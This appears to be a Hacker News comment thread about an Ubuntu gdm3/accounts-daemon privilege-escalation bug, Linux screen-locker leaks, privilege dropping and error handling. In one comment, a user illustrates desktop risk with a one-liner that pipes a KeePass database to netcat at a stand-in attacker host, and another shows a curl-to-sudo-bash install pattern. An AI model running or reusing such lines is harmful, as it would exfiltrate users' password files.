Slightly offtopic, but a common exploit(?) I frequently see with Linux desktop environments is a few seconds where the user's live desktop is displayed after resuming from standby, before the logon screen comes up. Not exactly a case of obtaining control of one's computer, but could be effectively used through repetition to transcribe any sensitive content that may have been onscreen.

It always struck me as a very strange phenomenon to occur given the apparent security superiority of Linux in contrast to Windows. Perhaps that's an antiquated notion now, given modern distros that prioritise form-over-function more than they used to?


The security superiority of Linux in contrast to Windows is rooted in its server/headless form - all of that changes as soon as you start good old X

Wayland is supposed to fix most of those legacy shortcomings enabling proper app-level sandboxing. It took a while, but its implementations are more or less usable as daily drivers these days - if you're interested in desktop security, help to push Wayland to become a hassle free replacement of X is appreciated a lot


On the other hand, has Wayland figured out how to allow screen shots, screen sharing in video meetings, live streaming your screen and such things yet?


Yep, those things work (though both GNOME and KDE still have unstable compsitors, so take that as you will).

There is also pipewire going somewhat stable (I had issues with bluetooth but otherwise it worked perfectly), that would enable all these things without applications having to worry about the compository at all.


For the longest time we've been unable to get ActivityWatch [1] (an open-source automated time-tracker) to work reliably on Wayland due to the inability in many Wayland DEs to retrieve the title and app name of the active window.

Things have improved recently (in part due to our own efforts to submit PRs to DEs), but we still need one implementation per DE more or less, since many don't implement the "common" Wayland protocol to accomplish this (Gnome, KDE).

[1]: https://activitywatch.net


The issue is that you still need to sandbox your apps, if you sandbox your apps you could probably create a sandbox around X too. So far most wayland+flatpack apps are not secure but the GUIS advertise them as sandboxed.


Linux screen lockers are somewhat notorious for security-ish bugs like that. There's a project called XSecureLock that aims to address some of those, although I'm not sure if it fixes (or can fix) the restore-ram type bug you detailed.

https://github.com/google/xsecurelock


When configured properly, xsecurelock does fix this type of bug. The key is to use the -l option of xss-lock, which passes a lock file descriptor to xsecurelock and waits for it to be closed before allowing the suspend.

https://github.com/google/xsecurelock#automatic-locking


That's really useful, thank you! Great to know that others share the same security concerns around this process. I will be sure to try this out.


> security superiority of Linux in contrast to Windows

This doesn't exists. Linux is more secure on the desktop because it doesn't attract hackers with its 1% market share and because its users are more tech savvy.

Arguably otherwise Windows has better defense because it comes with built-in virus scanner. Also both systems pretty much don't have any sane security policy for the end user at all by default, because they both are trying to defend from the wrong threat - privilege escalation, - which is irrelevant for desktop users 90% of the time.


This is a common argument but the truth here is that Linux is deployed _far_ more commonly than windows. Just not in a desktop context.

I understand you clarified with “on the desktop” but the best practices that exist on Linux: (signed/audited/centralised) packages, mandatory access control, running as a standard user, etc are things which Windows is only just catching up with.

There are holes, but saying windows is more secure because it’s been attacked more ignores a huge part of the problem windows has had for generations: running as admin when you shouldn’t and sticking the UI into the kernel.


Windows isn't running anything as admin by default for a decade now. Every action that requires elevated privileges is asking for permission via UAC, same as (gk)sudo but more secure.

> the best practices that exist on Linux: (signed/audited/centralised) packages, mandatory access control, running as a standard user

These are standard practices on every OS that every sane admin implements. Again, just because someone's grandma runs windows 95 under Administrator, doesn't make modern deployments less secure. Also, by far the most popular command on linux is something like `curl -sL https://deb.nodesource.com/setup_12.x | sudo bash`. Do we need to discuss how your security configuration is irrelevant once you run this? This doesn't even require Xorg, and see about 'sudo' part below.

> sticking the UI into the kernel

Last time I checked, Xorg was running as root pretty much everywhere which if not at all different from security perspective.

But then again, privilege escalation is not the main risk for desktop user, because their data is readable by their OS account, doesn't matter if the account has admin privileges or not. If any of your desktop software is exploited via numerous vulnerabilities, or you ran custom script from the internet like the one above - even without sudo, - you are pretty much fucked, because these things can install a keylogger as current user and/or add a cron job or a daemon (again as current user) which will do obfuscated analog of `find ~ -name keepass.kdbx -print0 | xargs -0 cat | nc evil.haxxor.ru 1234` and it will go unnoticed for years.

Security model of all both Linux and Windows is so far behind the real world that it doesn't make any sense to discuss which one of them is more secure.


> Last time I checked, Xorg was running as root pretty much everywhere

Xorg hasn't needed to run as root for a long time; kernel mode setting (KMS) removed the main reason for it to run as root. Its successor (Wayland) never runs as root (unless, of course, your user is root itself).

> But then again, privilege escalation is not the main risk for desktop user, because their data is readable by their OS account

The current push towards sandboxing (flatpak, sandboxed browser processes, etc) makes privilege escalation relevant for desktop users again.


Using the settings used by most people, which do not show pop-ups when parts of Windows use privileges, is exactly as secure as allowing every program to do whatever it wants. It’s not a security boundary and exploits for it are not counted or fixed.


> > security superiority of Linux in contrast to Windows. Perhaps that's an antiquated notion now

> This doesn't exists.

It does exist, but as mentioned by the parent comment, that security superiority of Linux in contrast to Windows is a reputation it earned in the late 1990s and early 2000s; back then (before Windows XP SP2), Windows was a security disaster. Both Windows and Linux got better at security since then.

> Arguably otherwise Windows has better defense because it comes with built-in virus scanner.

Back then (before Windows Vista), it didn't. And one could also argue that this might be because Windows needs a virus scanner more than Linux does.


This actually used to be a common problem I would have on macOS, especially when docked to an external display. I wonder if these problems are connected somehow.


I think it’s just a fundamental problem of running a program that is essentially like any other that covers the screen.


I can see how that could come about (lumping window manager concerns all into the one bucket), but to me it's security implications make a good case for re-architecting this part of the system. I.e. having a separate part of the OS which marshals access to the visible desktop when transitioning between ACPI states.

For hardware-accelerated compositing situations, it might have something to do with unnecessarily long / out-of order retention of the GPU frame buffer, which I could conceive of as being dismissed as inconsequential in most circumstances.


Locking screens properly and securely is not entirely trivial.

There is some writing from the author of xscreensaver which makes for fun reading. Displaying the desktop for a few seconds could be the least of your worries. There have been multiple security issues in the past in various screen lockers that let you completely bypass the password screen (probably all fixed today, but who knows what else could be lurking).

I won't link it directly because I think (?) his site displays something else when your Referer header is hacker news. This should provide you with an entry point, and there are multiple other linux screensaver issues over the past years linked from that post.

https://www.google.com/search?q=jwz xscreensaver "The awful thing about getting it right the first time is that nobody realizes how hard it was."

You can also search for "XScreenSaver: On Toolkit Dialogs", but I think it's linked in that blog post.


It is entirely off-topic, and I have observed exactly the same phenomenon. I have also felt the same reaction - "Isn't Linux \"better\" "?

I have a 20.04 thinkpad that I rarely use for reasons (partly that it doesn't come out of suspend most of the time, forcing a hard reboot) but I remember this being a problem back when my Ubuntu install was functional :)


> partly that it doesn't come out of suspend most of the time, forcing a hard reboot

I had the same problem with my T14s (AMD). Installing kernel 5.8 via `apt install linux-generic-hwe-20.04-edge` solved the suspend issue for me.


> a few seconds where the user's live desktop is displayed after resuming from standby

I would be surprised if this isn't configurable. In fact, I'm pretty sure that XScreenSaver has exactly this "fade" parameter as a number of seconds and can be disabled. No idea about other screensavers.


What?.. How could you generalize this across all of "Linux"? Or did you mean something else?

I know what you're talking about, and I'm pretty sure it's a very GNOME-specific problem (or gdm, or whatever login manager they use by default...) because when I started out on Ubuntu earlier this year, there was a very active bug report about it. I could actually probably find it if anyone was curious.

But I've long since ditched gnome because well, I hate it. On KDE now and never had this problem. I'm pretty sure this is not an "all of linux" problem at all though.


I use KDE and I have this problem. Similarly when I switch vterms (I have separate X11-Sessions for my personal and my work-from-home user account), I can briefly see the content of the session that I switched away from (without having locked it) before the lockscreen comes up.


Yes, you're right, I think I've picked up a little confirmation bias based on my choice of distro lineage (in hindsight all have been some derivation of Ubuntu, with some variant of a Gnome 2 / 3 desktop environment). I guess where I was coming from was that I would have expected some mechanism at the lower level of the OS to marshal this kind of behaviour, rather than it being trusted to the window manager. Maybe this stems from security being mainly thought of as a terminal / ssh-level concern, rather than the GUI.

I will give KDE a go!


This was maybe an issue back in the day but should be fixed now. logind has a PrepareForSleep event and a lock mechanism to let the lock screen show up before the machine goes to sleep.


I didn't see it mentioned in the article, so just to clarify, this was fixed with https://ubuntu.com/security/notices/USN-4616-1


How can you tell if an Ubuntu 20.04 server has this fix?


The article states that server isn't affected, because it requires access to a graphical desktop session.

Edit with direct quote from the article:

> Disclaimer: For someone to exploit this vulnerability, they need access to the graphical desktop session of the system, so this issue affects desktop users only.

Am I wrong?


It's somewhat common to install a graphical environment on server machines, particularly if they need to run certain (Oracle) enterprise software, for which GUI tools are either the only option, or by far the most expected and documented solution. Of course in theory you could install the bare minimum to run the utility using X-forwarding, in practice anyone doing this usually installs a full environment because it's much simpler to manage.

Plus, there are a few admins out there who simply prefer to use VNC over a straight terminal. I'm not here to judge; while this is uncommon, it's certainly not unheard of. Personally I would rather not have that much attack surface on my servers, but there are a few legitimate use cases here and there.


> It's somewhat common to install a graphical environment on server machines

It's really not that common. Yes there's the odd cases of servers that use enterprise software that have to have GUIs, but most linux boxes run headless. GUIs are just a waste of processing power and resources for the large majority of the things that servers are used for.

That said, I'm not happy that Canonical are entirely discounting the possibility that customers will have desktop environments installed on servers. It's not common, but it does happen.


I think this requires both a desktop environment to be installed, and local access to the server to be exploited (in most cases: X server is configured not to allow remote access by default in Ubuntu afaik).

The core vulnerability is in gdm which means that you have to have that running as a system service.

Though on second thought, if one can easily set up X forwarding as an unprivileged user, it might still be trivially exploitable.

Anyway, the announcement means that Ubuntu has fixes in affected (desktop) packages. If they are installed on a server, they'd be fixed with next apt update/upgrade too: they use the same package repositories.


One thing to note is that depending on how your network is structured and firewalled, if _one_ server has a graphical env of some sort (maybe a ML/image processing server that has graphical environments installed)... root access could be nasty nonetheless.

I never install GUIs on my servers, but when deploying a image processing server, while installing another package to debug CUDA/drivers, I've unintentionally added a full windowing system without realising it.


Unfortunately, nvidia-settings requires xorg to be installed and running (even when run in cli mode), and it's pretty much the only way to control fan speeds on consumer GPUs.


If you install a GUI on Ubuntu Server it simply becomes Ubuntu Desktop.

There's no difference between the two, except for the presence of the GUI software.

Simply go apt install ubuntu-desktop on any server and you got yourself a desktop install.


Only if the server has no GUI installed. I worked a place where the Network Admin, had a bunch of older RedHat servers with GUI's. I had to become the "bad guy" because on the newer boxes I was in charge of I refused to install a GUI, a bunch of devs pissed and moaned because they couldn't use xterm to connect to the new servers. It was pretty backwards place.


We run some machine learning systems on Ubuntu server, and it's really easy to accidentily install the full desktop environment while installing random graphics driver related packages. While figuring out how to set things up (before I formalized in an ansible script) one of the servers ended up with the desktop packages installed. Weird to look at the IPMI overview and between all the white on black kernel log outputs suddenly seeing a full Ubuntu desktop boot screen.


At the risk of igniting an irrelevant flame war, this is one of the primary reasons why I use Vim and only Vim as my IDE. I don't have to care about lack of graphical environments ;-)


side note, long time - and still current vim developer who also uses JetBrains IDE products...

I'd pay similar money to have a similarly robust VIM plugin from a supported vendor with great support and sane keybindings OOTB.

man, its easy to get spoiled with tons of ram and a great IDE.


Yes, I don't know if anybody will ever see this, but I agree! I would gladly pay similar for a robust VIM plugin setup that gave me similar features on a range of languages.


You can use "apt-cache policy", for example. This way you can see the current installed version of a package in your system, and also if there's a newer version you can install (the candidate).

  $ apt-cache policy accountsservice
  accountsservice:
    Installed: 0.6.40-2ubuntu11.6
    Candidate: 0.6.40-2ubuntu11.6
If the installed version reported by the utility is the version that Ubuntu states the problem has been fixed for your release, then presumably your system is safe (for this bug).


Check if the installed version is equal to or higher than one of the listed fixed versions. Likely it isn't even installed on a server edition.


Assuming the server can reach the normal apt repos - you could: sudo apt update; apt list upgradable

And grep for this package. Otherwise

sudo apt update

/usr/lib/update-notifier/apt-check --human-readable

Will list number of pending security updates.

(part of update-notifier-common, and in task:server along with various desktop-tasks)

Beyond that, you might want to look at https://vuls.io or other auditing packages. Or perhaps:

sudo snap install cvescan

cvescan

Seems it could use some exposure - I wasn't aware of it: https://github.com/canonical/sec-cvescan


The real problem is here:

> It uses D-Bus to ask accounts-daemon how many users there are, but since accounts-daemon is unresponsive, the D-Bus method call fails due to a timeout. (In my testing, the timeout took around 20 seconds.) Due to the timeout error, the code does not set the value of priv->have_existing_user_accounts. Unfortunately, the default value of priv->have_existing_user_accounts is false, not true, so now gdm3 thinks that there are zero user accounts and it launches gnome-initial-setup.

I am sick and tired of programs trying to continue onward somehow after encountering "impossible" error conditions or tripping over arbitrary timeouts. Failing fast when something looks funny is essential to the creation of a secure system. When you write something like the gdm3 code above --- which, when it runs into trouble, clears any ambient error and pretends that the system has no current users --- you may think you're doing the user a favor by continuing to operate, but what you're doing is in fact willfully entering some unknowable and unexplored region of the system's state space, usually one full of dragons and anthrax.

What you want to do instead is just die when something goes wrong. gdm3 should respond to a failure to contact org.freedesktop.Accounts with either a hard lockup or a forced restart of the gdm3 daemon.


The usage for code that I currently write is internal and it’s made with usability in mind, so I am guilty of coding stuff like this on occasion. By that I mean that my code, under certain circumstances, assumes the best and continues moving forward.

I do this for a specific reason: I don’t want my team to get pinged with a support request for something trivial.

So this type of bug is a huge eye opener for me. I still want to strike a balance between usability and clarity, but this story makes me want to review a lot of the code I’ve written. None of it is mission critical and on this level, luckily.


I've found that I spend more time debugging arcane horrible things that go wrong as downstream consequences of recovery paths than I do debugging straightforward and obvious problem reports that come from hard assertion failures and failing fast.


While the DoS of accounts-daemon is bad, it seems like the real problem here is that gdm3 running with broken/absent/etc. accounts-daemon will believe there are no accounts even though there may be? Surely this is extremely trusting behaviour on gdm3's part and should also be fixed?

But all the updated versions are for accounts-version, not gdm3. Do they change the 'default' response somehow?



Ah, cool. That's good. CVE for that appears to be https://nvd.nist.gov/vuln/detail/CVE-2020-16125 and fixed in 3.36.2 or 3.38.2..


The first documentation I could find about accounts-daemon by googling is this:

https://utcc.utoronto.ca/~cks/space/blog/linux/UbuntuAccount...

Not reassuring.


In my over twenty years of using Linux, this is the first I had heard of "accounts-daemon", and I'm the kind of nerd who browses repositories for fun, looking for new and interesting packages.

So I googled "accounts-daemon", and these are the titles for the first three results:

  1. "What does accounts-daemon actually do?"
  2. "Should I disable accounts-daemon?"
  3. "Process accounts-daemon taking 100% of CPU."
Not reassuring indeed.


It's accountsservice: https://gitlab.freedesktop.org/accountsservice/accountsservi...

It's an API and associated service daemon to add/remove/modify users, since Linux does not have one of those. (except forking out to useradd/usermod/userdel, except on Debian where they supply the adduser/rmuser commands instead, because consistency is for chumps, I guess)


Not “instead”. The adduser/rmuser commands are in addition to useradd/usermod/userdel, which are more low-level.


browsed the repo 30s and found this commit https://gitlab.freedesktop.org/accountsservice/accountsservi...

    Never delete the root filesystem when removing users
    Many, many user accounts use / as their home directory. 
    If deleting these accounts with accountsservice, we should just ignore requests to 
    delete the home dir, rather than trash the user's computer.

    Fixes #57


Slightly off-topic, but why on Earth does something like this need to be written in C?


It's from the freedesktop folks. (Like systemd, dbus, pulseaudio, and all sorts of other services to make linux more 'desktop' friendly)


Yeah, that's a windmill I've given up tilting at. And it has gotten better, but mostly through painful learning experiences like this one. But some days I wonder if I'd just be better off moving to OpenBSD or heck Plan 9 or Inferno.


I switched to FreeBSD and haven't looked back - from an admin perspective it's very much like 2000s-era Linux. Less stuff works by magic, but once you configure something right it stays configured right.


> OpenBSD

Use a Thinkpad that's not too new? OK without 802.11ac and Bluetooth?

Come take a dip, the water is just fine.


Wait, why can't OpenBSD handle Bluetooth? Is it just that the same chip is used for both wireless protocols and it doesn't support them yet?


Not a hardware issue, but a protocol issue. It used to be supported for limited devices (mostly HID) but the implementation was poorly designed and overly complicated. It was pulled out in 5.6 and its absence has not annoyed a developer enough to replace it.


>OpenBSD

Don't bother. OpenBSD's performance is atrocious. I hear dragonflyBSD actually has first-class multiprocessor support, and have always wanted to try it out.


Software in different security tiers shouldn't be compared on the basis of performance.

I don't care if my OS is faster if it's being used to compromise my systems, eh?

It's like, if you take the armor off a tank it will go faster, sure, but don't ride it into battle.


I don't think the OpenBSD security claim is as great as it sounds. Unless you are only running sshd and pf, you are beyond their "default install" and heavily into packages and ports.

Is gnome 3 on OpenBSD significantly more secure than on Linux? I very much doubt it.


I dare you to go ask that on the OpenBSD mailing list.

No seriously. I don't know. I'd like to know.

We don't have to speculate and bloviate. Go ask them.

https://www.openbsd.org/mail.html


Can anyone help me understand this part?

> Dropping privileges means that the daemon temporarily forfeits its root privileges, adopting instead the lower privileges of the user. Ironically, that’s intended to be a security precaution, the goal of which is to protect the daemon from a malicious user who does something like symlinking their .pam_environment to /etc/shadow, which is a highly sensitive file that standard users aren’t allowed to read. Unfortunately, when done incorrectly, it also grants the user permission to send the daemon signals, which is why we’re able to send accounts-daemon a SIGSEGV.

What’s the recommended way to drop permissions while blocking the ability to kill the process (sure you can mask off SIGSEGV but SIGKILL isn’t maskable)?

Also, the wording makes it sound like you can re-acquire the original permissions which I thought is impossible. Isn’t dropping permissions a one-way operation? I would have thought there was some usage of fork here but the usage of `pidof` and 1 result in the write up would imply no forking. Maybe a link to the source here would be sufficient for me (I don’t see one in the article or in the thread here).


Answering my own question. Found the bug report: https://bugs.launchpad.net/ubuntu/+source/accountsservice/+b...

Accountservice is actually changing its user ID rather than dropping capabilities which is where my confusion came from. It looks like there’s magic in the kernel to allow a process to switch back to the original user & some nuance about some ways of switching allowing you to send signals while other ways make your process act like a semi-hybrid of two user accounts (I.e. it technically looks owned by your user but you still don’t have permissions to do things with it). Security issues always lie in these kind of weird nuances.


it strikes me that the serious bug here is the design of GDM to check accounts-daemon for existing accounts, and if that check times out, start account creation. Regardless of the nominal protections afforded by the system, if you rely on a daemon that accepts unprivileged user input to provide security-critical answers, and fail open if it doesn't respond, that's a bad idea.


Maybe GDM shouldn't even have the privilege to create a new account in the first place. Couldn't every privileged operation be requested through accounts-daemon?


yup. think it's fine to have a service that manages accounts, but a timeout in contacting it resulting in the start of a process that creates users (with privileges) is definitely no good. would be interesting to understand how it happened. is it a straight up bug? is it some sort of fallback in gdm to work around non-responsive account-service (potentially on new machines)? is it some sort of backwards compatibility thing? i can't imagine that it was coded that way intentionally, would be interesting to understand how it ended up that way...


Agreed, login manager should be saner (less relying on other processes) than that. Also, the very existence of accounts-daemon concept seems to be a mistake from the security and simplicity point of view.


I like slim Linux machines and I several times considered to remove or at least disable accountservice. I has never been clear to me why you need such service as long as /etc/passwd is world readable. So from this article I learn

* calling mount during installation(?) when there is no user. Makes no sense to have the daemon running later

* providing a user icon. Exactly the type of functionality I like to throw out

* providing a user specific language setting. I can see that this is useful for some users

So how is dropping privileges done correctly to avoid getting killed by the user? Running as another user is one way, but I guess that is not always feasible if you want the daemon provide services for the user. On the other hand accountservice is there for multiple (human) users. So as which of them is it running? Not at a machine right now...


> So how is dropping privileges done correctly to avoid getting killed by the user?

I think you got the wrong idea from the article, which is partly author's fault. He claims user should not be able to do that, but that is a highly anti-user anti-unix viewpoint.

Creating a destroying (crashing) processes running with uid of any non-root user is something like an obvious inalienable right of that unix user. It is expected that this works.

The problem to solve is that the crash of the user daemon confuses gdm (a root process) which then behaves as if the computer is in the installation phase and the user is to be trusted with setting up high-privilege account.

The solution for Ubuntu is obvious, fix gdm. For administrators / power users, use something simpler such as xdm, where these kinds of errors are unlikely to occur.


> So how is dropping privileges done correctly to avoid getting killed by the user?

I was wondering this too. What is the way to "correctly" drop privileges? Is it even possible to drop privileges within a process in a way that's immune to this?


There is no “tried and true” method to drop privileges after you’re done with them; this has been a constant source of headaches and security issues for pretty much any app that needs to be started as root in order to xxx (eg bind to a low port, if we pretend that’s the only way) and then drop said privileges.

The solution is almost always to use (or add) kernel constructs that would obviate the need to elevate in the first place, but they generally aren’t fine-grained enough so on paper it looks like dropping privileges makes more sense, though in practice it might turn out to be the bigger mistake.


The more or less default way how to accomplish this (ie. setuid(1)) is immune to that issue. On the other hand it does not really drop privileges in the modern sense as the process can regain them at any time because it is still owned by root.


No, a privileged process can't regain privileges after setuid(2).


Drop them in a subprocess, read the file and send the data to the parent?


logged in into one of my machines via ssh. The daemon is running with all uids being 0 and full capabilities. Don't see how that would be dropping any privileges. On the other hand

* The machine has no desktop user at the moment

* The program was patched on 04-Nov, I guess addressing this issue.


The program only temporarily drops privileges while reading the user-supplied file. The rest of the time, it would have all uids as 0 and full capabilities.


I guess you could fork first?


Fork then handle child/exec error codes appropriately.


Right, if the child runs as the user, the parent still running as root can reliably handle the situation that the user killed the child.

Don't remember having seen that. Well, sshd does it, but for more obvious reasons than handling signals.


Forking does not affect the possibility to receive signals, does it?


seteuid(uid) if you want to revert later.


> So how is dropping privileges done correctly to avoid getting killed by the user?

For this case of temporarily lowering access rights to avoid user loading unauthorized files, by only setting effective user id (EUID) (or filesystem user id (FSUID), though its use should be avoided nowadays) instead of real user id (RUID) like the code did. And same for group id.


> I has never been clear to me why you need such service as long as /etc/passwd is world readable.

And you access that using the POSIX getpwent(3) family of functions, which glibc wraps to honor nsswitch.conf. accountservice seems superfluous.


On Linux, set your fsuid instead. And do it in a subprocess you can kill to avoid the DoS.


Agreed. Why would you need to run a daemon for the latter two points? These requirements can just as easily be handled by storing files in a fixed location in the user’s home directory.


What's amusing is that this is a classic 30+yrs old "sym link" exploit. Interesting how classic most of the exploits coming up are, almost like the current generation don't know the lessons of the past ...


Its not quite a classic synlink exploit. Normally, the purpose of a symlink exploit is to get a privledged process to leak information about a file you don't have access to.

Here, as the article mentions, part of the attack relies on the fact that the privledged process goes out of its way to defend against such an attack.

As far as I can tell, the symlink is not even nessasary. You should be able to get the same effect by making 1TB big. Using sparse files, you don't even need much disk space.


What I find amusing is that the code for reading that .pam_environment file is broken: https://git.launchpad.net/ubuntu/+source/accountsservice/tre...

Basically, if the LANG and LC_ALL appear are across two 50 byte regions of the file, it'll fail to find them.


it would be 50 byte regions of any given line, right?


They don't even take that into account, which is another issue. They just look for those two strings in any 50 byte block, so if you have FOO=LANG\n that'll count as having LANG set.


fgets reads a line, not 50 chars


fgets reads until the next newline character, or at most size-1 characters. For arbitrary inputs, a loop like that sets ret to TRUE if the given prefix (i.e. LANG) is found at the beginning of any line, i.e. starting at the first column – or for longer lines, if it is found starting at the 50th column (or 99th column, etc.)

I don't know enough of the format of the .pam_environment file to tell whether that may lead to unexpected results.


Well this vindicates my years of keeping policykit and all that other nonsense off my systems (sadly haven't found a way to zap dbus). The less code you have the less opportunities there are to screw something up.


Exactly, I'm running fine without Pulseaudio, Policykit and SystemD. Good old sysv init scripts always work, less complexity means less chance for bugs creeping in.


I honestly have no faith in multi user linux. I would never give someone I didn't trust an unprivileged account on my system, nor physical access to my device.

There are so few multi user machines in existence that I doubt this mode of usage will ever get enough attention to be even moderately secure.


All nontrivial multi-user installations I'm aware of (universities, corporate, ... make it a dozen I've had to deal with) have one thing in common: none of them use things like accountsservice, policykit et al. Any extra plumbing, if necessary, is done through PAM one way or another.


Pretty much all servers I’ve ever worked with was multi-user. What’s even the alternative? A single account shared by all admins? That sounds like a nightmare from both a security and an auditing perspective.


But in that case hopefully all the admins are trusted. Parent was talking about untrusted users.


Right, my response was primarily to the claim that “there are so few multi user machines in existence”.

As for trust, there are probably few, if any, attack vectors more common than privilege escalation, so I’m not sure I follow that line of reasoning either.


machines in universities are typically multi user


The students are also trusted, or at least accountable. It's very different than a random stranger. That said, I wouldn't store anything truly private in a shared box like that, specially in the university, where the boxes are likely to be maintained by inexperienced undergrads.


> The students are also trusted

That is a tall bet :D

If anyone is going to try out crazy stuff for the sake of curiosity/pranks, it would be students.


> I doubt this mode of usage will ever get enough attention to be even moderately secure.

Don't shared web hosts count?


There is a lot of discussion in this thread about the involved components, technical details of the exploit, the guilt of specific distributions and patch policies.

However, the underlying core problem of the vulnerability is absolutely independent of any specific component, vendor, product or policy. The core problem are developers not thinking their stuff out. Reading from a file is an absolutely non trivial task, million things can go wrong and the responsible developer has to foresee and handle them all in a generic sane way. Maybe do not read until EOF, if you never expect more than a few bytes? Read the file async with a timeout? Taint the input? Do not put the system in a dependent, unsecure state before success of the operation. Expect stuff to fail and code accordingly! Think like a hacker and try to hack your own code. And do this for any single line of your code.

I learned to introspect my code in this way as a byproduct of learning Rust. It began with Rust's strict type system, which forced me to carefully consider each and every value and variable and how I toss them around and how and where and how long I am going to access them in my code. It continued with the error handling policies of Rust in a similar way. The learning curve of Rust was steep for me and coding the first months was tedious. But once I got the hang of it, I started to love it. Fighting the compiler, I have to go through every aspect of my code in a super careful way over and over again and once the compiler gives the Go, I feel love and appreciation for my code - as if I crafted something special, that was approved by the master. Code no longer was for me something thrown into the editor as fast as possible with just the effort to make it run somehow reliably. I felt now, as if my code was a piece of art, well thought out and beautifully crafted, made to serve for many years, like a musical instrument. In other words, Rust was changing the appreciation of my own work and gently shoved me to a more careful approach of coding.

At some point in development I go through my code to do some manual formatting, you know, aesthetic stuff like indenting to make the code look more beautiful (in a human way, not a linter's way). Like a last polish. And on this run, I look at my code as a hacker. How would I crack it? How would it handle that and that exception? I try to think really evil. I think many programmers shy away of this step, because it can mean a lot, a lot of new work. And this is where Zero Days as the one described in the thread originate.


> [...] gdm3 thinks that there are zero user accounts and it launches gnome-initial-setup.

What if the root user intentionally deleted all non-root users? GDM would just let anyone creates an user with wheel?


The root user obviously counts as a user account, otherwise you would be prompted to make a new account on every startup if you hadn't made any other accounts. The reason why it thinks there are zero accounts in this instance is because you've just killed the service daemon that would provide that number, so no number is received through the DBus call.


Wonderful write-up, great step by step descripting and some more insights on the underlying problems. There should me more write-ups structured like this!


Article well written and noteworthy exploit explanation. Bravo! 10/10


The root cause is a very common bug: treating no response as an empty response. It's usually caused by missing or bad error handling. Some libraries and RPC APIs make it impossible to differentiate between the two cases.

I've recently learned a lot of Rust. Rust's std::result::Result type [1] helps avoid this error. I think it is superior to the error handling facilities in other languages:

- C: errno, boolean return values, `null`

- C++: exceptions, errno, boolean return values, `null`; std::expected<T,E> is being developed

- Java: exceptions, `null`, Optional<T>

- Golang: `nil`, `error`, `if err != nil { return nil, err }` boilerplate

- Javascript: `undefined`, exceptions, futures

- Python: exceptions, `None`, boolean return values

- Swift: exceptions, `nil`, `try?`, optional values

- Dart: exceptions, futures, `null`

Would it be worthwhile to create Result-like error handling libraries for the major languages?

[1]: https://doc.rust-lang.org/book/ch09-02-recoverable-errors-wi...


Excellent job Of research and presentation!


Very good writeup. It's amusing that Ubuntu didn't double check in the user creation tool to ensure there was in fact no current administrator account.

Sounds like a fun day to me.


An administrator account, in this context, is one that's a member of the "sudo" group. It's perfectly ordinary for more than one account to be a member of that group.


More unwanted complexity in the base system :(

I wish I had a Linux distro that split the OS from the userland more neatly.

I want to boot into something minimal and static, and then add complexity from there. Maybe logging in to a local container instead of the actual OS?

Linux as an easily extendable building filled with rooms and workshops and entertainment areas, rather than Linux as a mere desktop.


NixOS, my friend. NixOS.

I still can't believe it's not more widely used (and I only started using linux full-time earlier this year). It confines the entire (non-user) filetree into the read-only /nix directory, and manages every single component of the OS through Nix, the package manager - and I guess nix-daemon in the case of NixOS specifically - 100% declaratively. You define the entire thing through a single configuration.nix file.

You can even do crazy stuff like erasing the root upon each reboot, leaving only /nix and /home if you wanted, and I think I remember in the article I was reading about it that it can mount everything on a tmpfs or something like that, so you have a perfectly "clean" root tree every time you restart the computer (as /nix is stateless, it's guaranteed not to change except when rebuilding the system configuration).

The point of nixos is really the declarative aspect, with "splitting" the OS being more of a secondary benefit, but for your case, you might like the whole declarative builds thing in general to accomplish that.


> NixOS, my friend. NixOS.

Is there an option that doesn't require everyone who uses it to learn an entirely new language?


>Is there an option that doesn't require everyone who uses it to learn an entirely new language?

This.

Also, in my experience proponents of NixOS significantly understate the technical complexity and various idiosyncrasies present in trying to get NixOS set up and usable for daily driving. I found several examples where the documentation was unclear, confusing, or out of date.

Coming from DevOps, I'm certainly a fan of declarative/immutable patterns, but it feels like NixOS requires more work than some would have you believe.


One of the joys of computing is that sometimes you have to educate yourself on new developments.


Maybe look into Qubes OS? I've never used it, but the concept sounds kinda like what you're describing: "a security-focused desktop operating system that aims to provide security through isolation. Virtualization is performed by Xen, and user environments can be based on Fedora, Debian, Whonix, and Microsoft Windows, among other operating systems." (from Wikipedia)


Besides NixOS, which is mentioned by jdally987, Fedora Silverblue also fits that bill. A basic immutable desktop OS with atomic updates/rollbacks. Applications are installed through Flatpaks or containers (per Fedora Toolbox or podman).


This reminds me when I figured out how to get into a desktop from a locked Windows machine (can't remember which one, maybe 95). It was my "party trick" for a while and friends thought I am a hacker. Then I learned this was commonly known and later nobody believed me I found it on my own.


What trick did you use?


I can't remember exact details, but I was able to open help from the locked screen and then from help I was able to launch the explorer. I think it was similar to this: https://i.imgur.com/rG0p0b2.gif


>The next step is to send a SIGSTOP signal to accounts-daemon to stop it from thrashing that CPU core. But to do that, you first need to know accounts-daemon’s process identifier (PID).

Or just 'pkill -SIGSTOP accounts-daemon'. pkill matches by process name.


Not sure why this wasn't a dupe of my submission [1] submitted ~8 hours earlier? Oh well.

[1] https://news.ycombinator.com/item?id=25046588


What the hell does accuntservice do, and why does ubuntu need a dedicated service for that?

To clarify, do we really need a service (and an unsafe, exploitable one), to do something, we've been doing without it for years on all other distros.


I actually got a decent answer to this, from what appears to be a developer working on something in the FreeDesktop.org ecosystem:

> Way better for writing gui apps against instead of wrapping suid binaries and parsing strings horribly.

I would call that a laudable goal. Just seems like the design needs a deep security review.


The unsafeness here was GDM, not accountservice.


Modern Linux kernel APIs are asynchronous spaghetti. Someone realized blocking userspace could be a performance issue (you need to spawn a thread to invoke the kernel API if you want to stay responsive while the kernel does stuff), and that using the setuid bit in large daemons is dangerous (they had already decided to abandon the unix way, where there are small binaries, and each does one thing well). The solution was to make everything asynchronous without providing proper barrier operations, expose it via local network daemons, and to layer a new permissions system atop it. To see why this makes things hard, consider using modprobe to load a hardware driver. It has to detect and initialize hardware, and this can take some time. That happens in the background, so you need to be able to ask the driver if the hardware has “settled” before proceeding. Otherwise, you can’t differentiate between “zero wifi cards” and “wifi card is almost ready”. That’s probably fixable, but hardware isn’t attached to a flat bus. What if the wifi is on a usb bus that’s initializing? What if it’s plugged into a usb hub that’s initializing? The “solution” is to double down on the problem: Introduce an event bus that anything can talk to, and have it asynchronously forward messages between processes and the kernel. It eventually tells userspace when new hardware arrives, but that creates a new problem. How long should the startup scripts wait to start things like ntp and nfs clients? You can’t interaxt safely with the filesystem until those daemons are ready. What about X11? Locking users out when there’s no video card is bad. So is dropping to a text prompt for a few seconds. Anyway, it’s clear this was never thought through to a clean solution. Clean solutions exist in other systems, of course, but not here. Before systemd became the spearhead of this train wreck, people frequently complained about 